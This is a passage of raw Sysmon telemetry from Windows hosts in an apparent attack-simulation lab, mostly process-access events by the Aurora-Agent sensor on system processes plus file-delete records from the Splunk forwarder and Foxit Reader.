12:28:51.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000046077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:51.137{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD5A1DDDA8B3EB8059CE9136B72FBD81,SHA256=D58ADB57A04214D28887359A2888EF9AE38DCA84EFD1678E64226C08EF152DD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018395Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:52.495{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C8E6EAB389DC2D1F46A101D7F0CF5A,SHA256=7BD3B4389E4D3242B00DB5ACA709AE742E8DEC58F0E9216EF72DFF30B53C8DB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:52.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000046102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:52.195{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F55950067E5A3FF28F71D7AD30F143BE,SHA256=4C0DDF76281B3052A7780D8A836DFB4AD7B7E36F5CB78AB32FC05E88E3FD6D81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018396Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:53.552{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=935233E54D247CF7C2003AF0751D07A4,SHA256=91902DF1197B758E1500E15A1A0AE480BB4F9FABCA4AA2E0FA9AFF8C714E9D10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:53.269{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D031A81AE1CD5E4CFC7D0A4EDB55F6D,SHA256=C854A2BE5E0F19D46DE2125CAF9797C5A8BEF9A7F7E13A80BF20BE6390F8F156,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018397Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:54.624{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EF8AA5A8B564DAADF03FD429B284CF,SHA256=2B5EC2A6E3F38597F00DA3FA5B4D73B213A12F12B2B645D27E72D1E2B140EE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.956{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=DEC8F92763BD047891890F817477BCB2,SHA256=6EB37D8D7E216FE5CA6187D8B3B614F21E2CE59006F3283BD8114BF0E3718C87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.947{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=9BE8A5955C5FB2306923C94011F116A8,SHA256=294F63FF4BFD4779568B0DF7CE373C4FF19160276B72ABBE5C4A7AEA6FBB9E3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 